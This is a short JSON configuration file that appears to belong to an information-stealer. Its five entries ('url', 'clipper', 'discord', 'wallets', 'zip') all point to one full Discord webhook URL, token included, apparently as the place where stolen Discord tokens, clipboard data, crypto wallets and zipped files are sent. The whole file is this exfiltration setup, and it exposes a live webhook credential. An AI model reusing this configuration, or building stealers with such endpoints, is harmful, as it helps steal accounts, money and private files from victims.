{
    "url": "https://discord.com/api/webhooks/996883129962868907/IoVH9zKFeWB40HNklM1niK_aj08cMtZc_l07C6-sY0fxW3LpHo9CvDPkaI3XSXx4gGe_",
    "clipper": "https://discord.com/api/webhooks/996883129962868907/IoVH9zKFeWB40HNklM1niK_aj08cMtZc_l07C6-sY0fxW3LpHo9CvDPkaI3XSXx4gGe_",
    "discord": "https://discord.com/api/webhooks/996883129962868907/IoVH9zKFeWB40HNklM1niK_aj08cMtZc_l07C6-sY0fxW3LpHo9CvDPkaI3XSXx4gGe_",
    "wallets": "https://discord.com/api/webhooks/996883129962868907/IoVH9zKFeWB40HNklM1niK_aj08cMtZc_l07C6-sY0fxW3LpHo9CvDPkaI3XSXx4gGe_",
    "zip": "https://discord.com/api/webhooks/996883129962868907/IoVH9zKFeWB40HNklM1niK_aj08cMtZc_l07C6-sY0fxW3LpHo9CvDPkaI3XSXx4gGe_"
}
